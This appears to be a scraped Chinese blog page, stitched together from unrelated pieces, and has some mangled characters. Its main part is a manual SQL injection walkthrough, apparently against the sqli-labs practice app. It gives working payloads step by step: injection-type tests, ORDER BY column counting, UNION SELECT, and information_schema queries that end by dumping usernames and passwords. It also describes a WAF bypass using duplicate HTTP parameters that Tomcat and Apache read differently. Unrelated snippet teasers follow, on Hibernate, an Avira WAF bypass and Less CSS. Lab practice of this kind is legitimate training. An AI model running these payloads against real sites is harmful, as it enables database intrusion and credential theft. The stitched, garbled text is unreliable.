waf是只允許輸入數字的,我們在輸入數字的時候先給waf看然後檢測正常後才**給我們需要訪問的頁面,那篇文章是有寫到的,這裡我弄2個值,乙個是用來欺騙waf的。另乙個才是給我們需要訪問頁面的
看一下這篇部落格,
1.先判斷注入型別
(1)輸入:?id=1
(2)輸入:?id=1 and 1=2
(1)(2)頁面沒有變化,不是數字型
(3)輸入:?id=1'
出現錯誤
(4)輸入:?id=1''
結合(3)(4)id='1'
2.對列數進行判斷:
(1)輸入?id=1' order by 3 --+
(2)輸入?id=1' order by 4 --+
3.八
結合(1)(2),是3列
3.檢視顯示位,判斷手注位置
(1)輸入?id=-1' union select 1,2,3 --+
2,3為顯示位,此時可在2,3位置進行手注
4.爆破
(1)查詢所有資料庫:?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
(2)爆庫:?id=-1' union select 1,database(),3 --+
(3)爆表:?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+
(4)爆列名:?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+
(5)爆值:?id=-1' union select 1,group_concat(username,0x7e,password),3 from security.users --+
另外還有別的方法
利用tomcat與apache解析相同請求引數不同的特性,tomcat解析相同請求引數取第乙個,而apache取第二個,如?id=1&id=2,tomcat取得1,apache取得2
乙個hibernate mapping的錯誤
在使用hibernate對映的時候 如果配置 onetomany cascade cascadetype.persist,fetch fetchtype.eager joincolumn name orderid referencedcolumnname order id private setbu...
小紅傘的WAF乙個繞過方法
今天遇到乙個小紅傘的waf,隨手測了下,發現很多都攔截了。但是任何waf都不是萬能的。對此,該waf我發現了乙個缺陷。例如在大小字元上沒有做什麼匹配策略。我可以很輕易的繞過去。雖然沒法構造能夠通過名單的select,但是其他的都繞過去了。把一些敏感的東西發出來,給有需要的人用。select 一開始這...
Less入門一 概述 我的第乙個less
less是一種動態的css樣式語言 less 將 css賦予了動態的語言的特性,如變數,繼承,運算,函式。less既可以在客戶端上執行 支援ie6 webkit chrome,safari,opera firefox 也可以借助node.js或者rhino在伺服器端執行 最新版本2.1.2 從git...